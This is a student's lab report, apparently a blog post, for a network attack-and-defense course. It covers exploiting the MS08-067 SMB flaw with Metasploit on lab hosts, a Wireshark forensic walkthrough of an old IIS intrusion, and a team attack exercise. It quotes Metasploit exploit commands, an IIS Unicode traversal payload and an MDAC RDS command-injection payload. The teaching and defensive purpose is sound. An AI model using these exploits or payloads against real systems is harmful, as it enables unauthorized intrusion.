20252921 2025-2026-2 《网络攻防实践》第6次作业

1.实践内容

1.1 实验内容

本次实验主要围绕Windows主机远程渗透、网络流量取证分析以及局域网团队攻防对抗展开。
首先,借助Metasploit渗透框架,针对Windows 2000靶机的MS08-067漏洞开展远程渗透实操,熟悉漏洞利用的完整步骤,掌握SMB服务漏洞被恶意利用、进而遭到远程控制的原理。

其次,针对Windows NT系统的入侵行为进行流量取证分析。利用Wireshark解析捕获的网络数据包,一步步还原完整攻击流程,包括网页服务探测、Unicode目录穿越、MDAC RDS漏洞利用、FTP传输恶意工具、通过Netcat搭建后门,以及后期搜集系统信息、盗取账户口令哈希等一系列入侵行为。

最后开展小组攻防对抗实验。在学生自建的局域网环境下,使用Metasploit对靶机实施渗透攻击,同时通过Wireshark实时抓取、解析攻击流量,加深对真实攻击流量特征的理解。

1.2 知识点梳理

  1. Metasploit框架
    主流渗透测试工具,内置海量漏洞利用模块、攻击载荷与扫描辅助工具,能够一站式完成信息探测、漏洞利用、权限获取与后渗透操作。

  2. MS08-067漏洞
    该漏洞依托SMB协议445端口进行攻击,攻击者构造恶意RPC请求,在无需账号密码认证的前提下,远程执行任意代码,直接获取服务器最高系统权限。

  3. 反向Shell
    由受害主机主动向外连接攻击者主机,攻击者本地开放端口监听等待回连。相较于正向连接,反向Shell可以有效避开防火墙入站拦截,穿透限制更强。

  4. IIS Unicode目录遍历漏洞
    攻击者利用畸形Unicode编码字符(如%C0%AF)绕过路径访问过滤规则,突破网站目录限制,随意读取服务器本地系统敏感文件。

  5. MDAC RDS漏洞
    利用msadcs.dll组件与相关查询接口构造恶意请求,绕过安全限制,恶意调用系统命令,从而入侵服务器、控制目标主机。

2.实践过程

2.1 动手实践Metasploit windows attacker
动手实践Metasploit windows attacker
(1)任务:使用metasploit软件进行windows远程渗透统计实验;
(2)具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权。
查看kali攻击机的IP地址为:192.168.200.7:
image
查看Win2k靶机的IP地址为:192.168.200.6:
image
首先在kali打开metasploit,输入命令行msfconsole进入启动msfconsole,回车后就会进入到其控制台界面;
image
在命令行输入search ms08_067查看漏洞ms08_067详细信息,可以看到,这是针对这个漏洞的渗透攻击模块;
image
输入use windows/smb/ms08_067_netapi进入漏洞所在文件,之后输入show options查看攻击此漏洞需要的设置
image
输入指令set LHOST 192.168.200.7设置Kali攻击机IP
输入指令set RHOST 192.168.200.6设置Win2kServer被攻击机IP
最后输入指令exploit进行攻击
image
如图所示,已经进入了靶机的命令行,输入指令ipconfig -all查看靶机信息
image
在打开wireshark再查看靶机信息的话,可以抓包到
image

2.2 取证分析实践:解码一次成功的NT系统破解攻击
下载学习通里的资料并用wireshark打开
image
观察报文发现第117条报文有点不对劲
image
是一条典型的 Windows IIS 目录穿越(路径遍历)攻击请求
..%C0%AF 是 ../ 的双字节编码形式,是早期 IIS 4.0/5.0 目录穿越漏洞的经典 payload:
%C0%AF 是 UTF-8 编码的 / 字符(在 IIS 中会被解析为路径分隔符)
..%C0%AF 等价于 ../,表示 “返回上一级目录”
三次 ..%C0%AF 组合,就是 ../../../../,目的是跳出 /guest/ 目录,直接访问服务器根目录下的 boot.ini 文件。
观察报文发现第140条报文有点不对劲
image
image

/msadc/msadcs.dll 是 Microsoft Data Access Components (MDAC) 的组件,是早期 IIS 服务器的经典攻击目标。
攻击者请求这个 DLL 文件,目的是触发其远程代码执行漏洞。
后面发现149条也有问题
image

目标路径:/msadc/msadcs.dll/AdvancedDataFactory.Query,直接调用 msadcs.dll 的 AdvancedDataFactory.Query 接口,这是 IIS 4.0 上经典的 MDAC RCE 漏洞入口。
攻击载荷:请求体中嵌入了 SQL 查询语句,其中包含了 shell("cmd /c echo werd > c:\fun") 命令,目的是在服务器上执行系统命令,创建 c:\fun 文件。
User-Agent:ACTIVEDATA,这是漏洞利用工具的特征标识,而非正常浏览器。
Content-Type:multipart/mixed 是 msadcs.dll 漏洞利用的标准格式,用于传递恶意参数。
161条
这是一条关键的攻击后验证流量,确认了攻击者之前的命令执行成功
image
状态码:HTTP/1.1 200 OK,说明命令执行成功。
响应内容:7、werd、0。
7:是 echo werd 的字符数(werd 是 4 个字符,加换行是 7 个)。
werd:是命令执行的标准输出。
0:是命令执行的返回代码(执行成功)。
最终结果:服务器成功在 c:\fun 中写入了 werd 内容。

119条
image
攻击者成功读取了服务器的 boot.ini 文件
..%C0%AF 是 IIS 4.0 目录穿越漏洞的经典 payload:%C0%AF 是 / 的编码形式,和 ../ 组合后,可以绕过目录限制,跳转到服务器根目录。
三次 ../ 跳转后,最终目标是服务器根目录下的 boot.ini 文件
服务器返回了 200 OK,并直接返回了 boot.ini 的明文内容:
image
这说明攻击者成功读取了文件,获取了服务器的系统版本、启动配置等敏感信息

(1)攻击者使用了什么破解工具进行攻击?攻击者利用 IIS 的 Unicode 漏洞进行探测攻击,同时使用了针对 RDS 漏洞的msadc.pl、msadc2.pl脚本工具,对目标系统开展渗透入侵。
(2)攻击者如何使用这个破解工具进入并控制了系统?攻击者先借助 Unicode 漏洞查看系统文件,查到 boot.ini,确定对方是 Windows NT4.0 搭配 IIS4.0 的老旧系统。接着利用漏洞脚本发送恶意请求,触发漏洞拿到系统最高权限的命令行权限。之后通过 FTP 服务,从自己的服务器下载 nc、pdump 等工具,搭建远程连接,从而完全操控目标电脑。
(3)攻击者获得系统访问权限后做了什么?成功入侵后,攻击者做了一系列后续操作:
在电脑里新建了文件夹,专门存放入侵工具,方便后续操作;
查看电脑文件和目录,摸索系统环境,寻找有用资料和其他漏洞;
利用工具盗取系统账号密码,方便后续渗透其他设备;
通过工具搭建后门,长期控制这台主机,还尝试扫描内网,扩大攻击范围。
(4)我们如何防止这样的攻击?日常可以从三个方面做好防护:
及时修补系统和服务器漏洞,安装官方安全补丁,删掉 IIS 里多余的危险目录和无用组件;
做好网页服务配置,过滤恶意访问代码,缩小服务器账户权限,关闭不用的 FTP、远程管理等危险功能;
安装防火墙、入侵防护工具,拦截恶意攻击请求,定期查看系统和网站日志,及时发现异常入侵行为。
(5)你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?攻击者完全没有发现这是蜜罐,一直当成正常的真实服务器在攻击。因为他从头到尾完成了一整套完整入侵操作,从探测系统版本、利用漏洞入侵,到下载工具、盗取密码、种植后门、扫描内网全都做了。如果察觉到是蜜罐,攻击者为了不暴露自身,一般拿到权限后就会立刻停止操作,不会进行这么多深度后续操作。

2.3 团队对抗实践:windows系统远程渗透攻击和分析
防守192.168.5.13(谭韬)
攻击192.168.5.9(褚浩)
image
我在防守侧打开 Wireshark 进行监听。为了让分析更集中,可以使用如下过滤条件:
ip.addr == 192.168.5.9 && ip.addr == 192.168.5.13
a882a89801a2956e65185fc1288d325
从监听结果可以看出,攻击机 192.168.5.9 先向靶机 192.168.5.13 的 445 端口发起连接并进行漏洞利用;在利用成功后,又能看到目标主机向攻击机建立新的反向连接,对应的就是 Metasploit 中显示的会话:
192.168.5.9:4444 -> 192.168.5.13:1044
因此,防守方通过抓包至少可以分析出以下几点:
攻击源 IP 是 192.168.5.9
目标主机 IP 是 192.168.5.13
攻击主要围绕 445 端口展开

攻守互换
防守192.168.5.9(褚浩)
攻击192.168.5.13(谭韬)
首先测试是否可以ping通
image
在Kali虚拟机中输入msfconsole,启动Metasploit框架控制台
image

输入指令use exploit/windows/smb/ms08_067_netapi加载MS08-067漏洞的核心利用模块。
image

展示配置是否搞好
image
分别输入以下指令,创建一个自己的文件夹,进入并创建文件写下标记内容
image
mkdir TT
cd TT进入该文件夹
echo I am TT>>Test.txtTT

3.学习中遇到的问题及解决

  • 问题:在攻防实验的时候老是ping不通,后面改了桥接之后发现在同一个网段了,本来是能正常使用,但是发现另一个室友也连接了我的手机热点,ip地址和我一样,老是给我弹出一个存在同名设备
  • 问题解决方案:回到宿舍之后能正常进行实验

4.实践总结

以前在本科阶段部分了解 MS08-067、永恒之蓝等漏洞时,只是简单知晓其属于高危漏洞,缺乏直观认知。本次借助 Metasploit 亲手完成完整渗透攻击后,我才切实弄懂了漏洞的利用逻辑。仅仅是未及时修补 SMB 服务漏洞,攻击者就能远程入侵主机、夺取最高系统权限,亲身实操过后,我才深刻体会到,及时安装系统补丁、设置高强度密码,是抵御网络攻击最基础也最重要的防护手段。
同时,在以防守视角使用 Wireshark 分析流量数据的过程中,我学会了从海量杂乱的数据包中梳理线索、还原完整攻击链路。也理解了 IDS、IPS 等安全设备,正是依靠专属流量特征识别恶意行为。这让我认识到,网络攻击并不是完全无痕的,常态化的流量监测与日志审计,能够有效追溯攻击行为、排查安全风险。
除此之外,本次实验也暴露出自身的不少短板:对各类漏洞的底层原理掌握不够扎实,攻击流程出错时,无法快速定位并解决问题;在团队攻防对抗环节,初期还存在不会选择监听网卡、操作不熟练等问题。这也让我明白,网络安全攻防注重实操性,书本上的理论知识只是基础,只有多动手实操、积累排错经验,不断在实践中查漏补缺,才能将理论融会贯通,真正掌握专业技能。

posted @ 2026-04-27 16:36  DKYTT  阅读(8)  评论(0)    收藏  举报